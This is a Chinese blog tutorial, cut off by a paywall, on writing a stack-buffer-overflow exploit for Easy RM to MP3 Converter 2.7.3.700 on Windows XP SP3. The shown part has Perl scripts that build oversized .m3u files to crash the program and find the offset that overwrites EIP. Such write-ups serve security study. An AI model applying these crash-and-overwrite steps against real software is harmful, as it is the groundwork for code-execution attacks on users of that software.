基于栈溢出的EXPLOIT编写

最新推荐文章于 2021-03-18 23:04:12 发布
最新推荐文章于 2021-03-18 23:04:12 发布
阅读量2.7k 收藏 4
点赞数
分类专栏: WINDOWS/R3/R0 汇编语言 文章标签: file perl windows dll c 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuzl32/article/details/6126592
版权

声明:以下涉及的内容只作为学习的目的,任何因为滥用本篇内容而导致对个人或者企业组织造成危害,作者并不承担任何责任。

◆ 目标软件

Easy RM to MP3 Converter(版本2.7.3.700)

辅助工具

WinDbg6.12、Metasploit3.4.1、ActivePerl5.12

漏洞描述

通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。

测试平台

Windows XP SP3 中文版(5.1.2600 Service Pack 3 Build 2600)

利用步骤

a) 下载并安装Easy RM to MP3 Converter(版本2.7.3.700

地址:http://www.rm-to-mp3.net/download.html

b) 创建一个特殊的.m3u文件,验证目标软件加载它时确实崩溃了 

  • #文件: crash.pl 
    #编译: perl crash.pl 
    #说明: 生成一个具有10000个字符A的crash.m3u文件 
    my $file = "crash.m3u"; # 要生成的文件名 
    my $data = "/x41" x 10000; # 10000个A 
     
    open ($FILE , ">$file"); 
    print $FILE "$data" ; # 将10000个A输出到crash.m3u 
    close ($FILE); 
     
    print "/nm3u file created successfully/n";

打开Easy RM to MP3 Converter,加载具有10000个字符A的crash.m3u无效文件,我们发现目标软件捕获了该错误,跳出友好提示:

clip_image002

clip_image004

接着,我们更改crash.pl源代码,使其输出20000个A试试,一样的结果。很好,换30000个……,目标软件崩溃了:

clip_image005

也就是说目标软件在20000和30000之间可以崩溃掉。同时,从上图可以看出程序的EIP也可以被我们填充成一个指向恶意代码的地址。(很明显,EIP 0x41414141是crash.m3u中的数据)。

c) 确定缓冲区大小并精确的填写EIP

从前面得知返回地址(EIP的值)在缓冲区开始位置的20000和30000字节之间。首先,我们采用二分法缩小查找范围,用25000个A和5000个B进行确认:

  • #文件: crash.pl 
    #编译: perl crash.pl 
    #说明: 生成一个具有25000个字符A和5000个字符B的crash.m3u文件 
    my $file = "crash.m3u"; # 要生成的文件名 
    my $dataA = "/x41" x 25000; # 25000个A 
    my $dataB = "/x42" x 5000; # 5000个B 
    open ($FILE , ">$file");
     
    print $FILE "$dataA" , "$dataB" ; # 将25000个A和5000个B输出到crash.m3u 
    close ($FILE);
     
    print "/nm3u file created successfully/n";
最低0.47元/天 解锁文章
yuzl32
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈溢出(PWN)学习笔记
Haowill的博客
12-14 5868
栈溢出(PWN)学习笔记 一、栈简介 数据结构中的栈 数据结构中的栈就是在表尾进行插入和删除操作的线性表。可以进行插入(push)和删除(pop)的一端称做为栈顶,栈底是固定不变的一端,空栈是什么数据都没有的栈。栈是一种后进先出的数据结构,先放入的数据最后取出,最后放入栈的数据,最先取出。 数据结构中的栈定义了一些操作。最重要的是PUSH和POP。PUSH操作是在栈顶部压入一个数据,并将栈顶的值加一。POP操作在栈顶部弹出一个数据,栈内删掉一个数据,并将栈顶的值减一。 linux内存布局 Kerne
Exploit编写教程1:栈溢出
周无争的博客
05-26 2168
Exploit编写教程1:栈溢出 要点提示: 复现环境首选 WinXP,因为没有 地址随机化ASLR,可以减少复现难度。ASLR在 Vista以上版本才有。 用到的工具有:python3\pwntools\windbg\x32dbg\msfvenom 造成崩溃后查看EIP是否为目标地址,使用 d esp 查看栈中的数据。 直接使EIP指向ESP不会有效果,要使EIP指向 jmp esp 指令的地址。 查看软件加载的DLL所在的地址范围,再使用 s 1a800000 l 1f200000 ff e4 查询该
强大溢出工具包 Metasploit使用教程
0ffs3t
10-24 1171
Metasploit 是个好东西,实在想不到别的办法了,或许这东西能帮你一下,Metasploit包含了众多exploit,说不准还能用上几个,搞几台好肉鸡.  下载Metasploit双击进行安装,非常简单,一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,第一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用方法,运行后我
exploit编写教程2:栈溢出,跳转至shellcode
xiaoeryu_的博客
03-18 1189
exploit编写教程2:栈溢出,跳转至shellcode 这篇blog是为了学习如何用各种方式去构造栈溢出类型漏洞的exp 执行shellcode的多种方法: jump/call 寄存器 pop return push return jmp[reg + offset] blind return jmp code SHE call 1. jmp/call 寄存器 在第一篇中已经详细分析过 2. pop pop ret 这个exp我们依然还使用上一篇分析的Easy RM to MP3的漏洞来编写,在上一
Exploit 编写系列教程》踩坑记
anyingga7675的博客
10-11 757
Exploit 编写系列教程第一篇:基于栈的溢出 ①用armitage生成shellcode: sudo /etc/init.d/postgresql start sudo msfdb init sudo msfconsole #启动后用db_status查看一下数据库连接状态 再打开armitage,生成shellcode: ②P18页最终想要Exploit弹出系统自带计算器,这里有...
Windows 远程栈溢出挖掘
weixin_30667649的博客
03-27 340
title: Windows 远程栈溢出挖掘 date: 2019-04-20 11:22:50 tags: 渗透测试 categories: 渗透测试 copyright: true --- 缓冲区溢出攻击很容易被攻击者利用,因为C/C++语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位...
Win32远程栈溢出挖掘
weixin_30924239的博客
07-05 106
缓冲区溢出攻击很容易被攻击者利用,因为C/C++语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位置,甚至包括控制程序执行流的关键数据(比如函数调用后的返回地址),从而控制程序的执行过程并实施恶意行为. 该笔记用于帮助读者理解远程缓冲区溢出的挖掘,以及编写漏洞利用程序片段,下面在进行实验前,读...
构建ROP链实现远程栈溢出
CSDN
02-21 9830
通常情况下栈溢出可能造成的后果有两种,一类是本地提权另一类则是远程执行任意命令,通常C/C++并没有提供智能化检查用户输入是否合法的功能,同时程序编写人员在编写代码时也很难始终检查栈是否会发生溢出,这就给恶意代码的溢出提供了的条件,利用溢出,攻击者可以控制程序的执行流,从而控制程序的执行过程并实施恶意行为,而微软的DEP保护机制则可使缓冲区溢出失效,不过利用ROP反导技术依然是可被绕过的,接下来...
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
栈溢出是计算机安全领域中的一个重要概念,主要发生在程序运行过程中,由于栈空间分配不当,导致数据超出预定的栈帧范围,从而影响到其他栈帧中的数据,甚至可能破坏程序执行流程,造成安全风险。本篇文章将深入探讨...
Exploit 编写系列教程.pdf
09-06
Exploit 编写系列教程.pdf
Exploit编写教程
06-14
在学习exploit的自动生成,exploit编写需要很多的基础知识,很好的学习文档
Exploit 编写系列教程 1 ~ 11
01-07
Exploit 编写系列教程 1 ~ 11
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 远程溢出
最新发布
03-18
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 远程溢出
GDI+实现图片格式转换(bmp、jpeg、gif、tiff、png)
03-17 9356
引言:通过GDI+我们可以很方便的对bmp、jpeg、gif、tiff、png格式的图片进行转换。步骤:1)    通过GdiplusStartup初始化GDI+,以便后续的GDI+函数可以成功调用。2)    通过GetImageEncodersSize获取GDI+支持的图像格式编码器种类数numEncoders以及ImageCodecInfo数组的存放大小size。3)   
深入研究Win32结构化异常处理(SEH总结篇)
04-07 8124
深入研究Win32结构化异常处理(SEH总结篇) 本文假设你熟悉WIN32,C/C++。引言: 本文是在《Win32 结构化异常处理(SEH)探秘》基础上做的更新总结。探索MS C/C++编译器和MS核心DLL在操作系统SEH上的不同扩展,逐个分析其内部采用的数据结构及处理流程。 摘要:     Win32 结构化异常处理其核心是操作系统提供的服务,特定的编
逆向分析NtDLL.dll!RtlUnwind函数
03-22 5328
引言:RtlUnwind是Kernel32.dll!_except_handler3中的全局展开函数。7C957A40 ; int __stdcall RtlUnwind(PVOID TargetFrame, PVOID TargetIp, 7C957A40 PEXCEPTION_RECORD ExceptionRecord, PVOID ReturnValue)7C957A
逆向分析MSVCR90D.dll!_except_handler4_common函数
04-04 5105
引言:_except_handler4_common执行_except_handler4转发而来的异常处理。102DCA80 _EXCEPTION_DISPOSITION __cdecl _except_handler4_common(102DCA80 unsigned int *CookiePointer, 102DCA80 void (__fastcall *C
逆向分析Kernel32.dll!BaseProcessStart函数
03-12 4725
Kernel32.dll!BaseProcessStart汇编代码如下:7C817054 ; __stdcall BaseProcessStart(x)7C817054 _BaseProcessStart@4 proc near ; CODE XREF: BaseProcessStartThunk(x,x)+5j7C8170547C817054 ms_exc = CPPEH_RE
Exploit_编写系列教程.pdf
01-02
"Exploit_编写系列教程.pdf" 是一套全面且详尽的Windows栈溢出和漏洞利用教程,由作者经过十个多月的努力翻译完成。该教程共分为十篇,涵盖了从栈溢出基础知识(如第一篇中的栈溢出原理)到高级技术,如利用调试器、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值